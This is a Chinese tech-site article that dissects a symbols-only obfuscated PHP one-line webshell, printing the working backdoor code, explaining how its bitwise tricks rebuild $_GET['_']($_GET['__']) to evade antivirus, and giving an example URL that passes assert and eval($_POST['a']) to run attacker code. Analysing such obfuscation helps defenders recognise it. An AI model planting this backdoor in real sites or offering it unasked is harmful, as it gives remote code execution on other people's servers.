• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

剖析PHP纯符号一句话webshell的代码

原作者: [db:作者] 来自: [db:来源] 收藏 邀请


复制代码
代码如下:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
${'_'.$_}['_'](${'_'.$_}['__']);
?>

以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

第一行:$_="";
定义一个以下划线作为命名的字符变量:$_,赋值为空。
此行实际上不影响代码执行效果,仅增加混淆效果。

第二行:$_[+""]='';
定义一个$_数组元素,其key为+"",赋值为空。
众所周知,PHP是个弱类型语言,也就是说PHP并不严格验证变量类型,所以这里+""作为数组了key,其值等同于0,所以此行等同于$_[0]='';
此时$_被定义为数组,覆盖上一行的定义。

第三行:$_="$_"."";
将变量$_强制转换为字符串,因为此时$_类型为数组,强制转换后的结果为字符串"Array"(string(5) "Array" ),而非数组元素的值。

第四行:$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
这一行涉及到计算机二进制的“或运算”和“异或运算”,这里先简单介绍下这两种运算规则:
1、或运算,符号为 |
运算规则:0|0=0; 0|1=1; 1|0=1; 1|1=1;
简单来说,或运算前后两个对象 只要有 一个为1,其值就为1,否则为0
2、异或运算,符号为 ^
运算规则:0^0=0; 0^1=1; 1^0=1; 1^1=0;
简单来说,异或运算可以看成是判断前后两个对象是否相等的,如果两个对象不同(即为异),则值为1,否则为0

再回到代码上来,此行代码分三个部分($_[+""]|"")、($_[+""]|"")、($_[+""]^""),用连接符“.”号相连,每个部分都是其中两个对象进行"或运算"或"异或运算"。
先看第一部分($_[+""]|""),很明显,这里是$_[+""]和""这两个对象进行“或运算”。
第一个对象$_[+""](也就是$_[0]),要注意其值已经不是第二行定义的空值,因为在第三行时$_变量已经被覆盖定义为字符串“Array”。这里涉及到另一个php知识细节:对于 字符串[数字] 结构,字符串将会当成数组处理,返回以后面数字作为索引的元素值,例如:$x='abcd9.com',则$x[4]='9'。可见,$_[+""]值为字符串“Array”第一字符“A”。
第二个对象""是一个特殊字符(注意:这不是短横,虽然长得很像,实际上是个特殊字符,此类符号在某些环境下无法识别而作为乱码处理。后面两部分中的特殊字符也如此。),暂不管为什么此处是这个特殊字符而不是其他字符,先在此行下增加一行测试代码显示这一行定义的$_值:
var_dump($_);
测试结果为:string(3) "GET" ,可见,($_[+""]|"").($_[+""]|"").($_[+""]^"")值"GET",显而易见,($_[+""]|"")值为“G”,($_[+""]|"")值为“E”,($_[+""]^"")值为“T”。
再先看第一部分($_[+""]|"")值为"G",上面已得到$_[+""]值为“A”,即("A"|"")="G",下面分析下此等式:
“A”二进制:0100 0001
“G”二进制:0100 0111
0100 0001 | x = 0100 0111
通过或运算规则推导并参考ASCII码对照表,x值可能有以下几个结果:

复制代码
代码如下:

01000110 //ASCII可显示字符:F
01000111 //ASCII可显示字符:G
00000110 //ASCII控制字符:ACK,代表“确认回应”
00000111 //ASCII控制字符:BEL,代表“响铃”

代码中的""即为ASCII控制字符:ACK。其实另外三个字符也适用,为了增加混淆效果故采用这种特殊字符。
搞清楚第一部分,第二、第三部分也同理可推。

第五行:${'_'.$_}['_'](${'_'.$_}['__']);
此行可通过小括号分成两部分:${'_'.$_}['_'] 和 ${'_'.$_}['__'],两部分结构均是${A}['B'],区别仅是后面B是一条下划线还是两条小划线。
先看相同部分${'_'.$_},这里涉及到大括号{}在php中的特性一个:在变量间接引用中进行定界,如"$abc"为变量$abc,而"${a}bc"为变量$a连接字符"bc",了解了这一特性,而第四行对$_赋值为“GET”,可见${'_'.$_}即为变量$_GET,加上后面['_'],则为$_GET['_'],接收"get"的表单中的变量为'_'的值。小括号里的部分同理。
根据上面叙述,第五行代码还原后是:$_GET['_']($_GET['__']);

至此,这段混淆代码已原形毕露,一句话后门代码原形为:$_GET['_']($_GET['__']),传递特殊参数构建webshell链接网址(例如:http://www.test.com/webshell.php?_=assert&__=eval($_POST['a'])),通过一句话木马客户端即可连接此URL。


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
路由器、交换机及防火墙漏洞的发现与防范方法发布时间:2022-02-06
下一篇:
openssl曝光重大安全漏洞 openssl漏洞详情发布时间:2022-02-06
热门推荐
热门话题
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap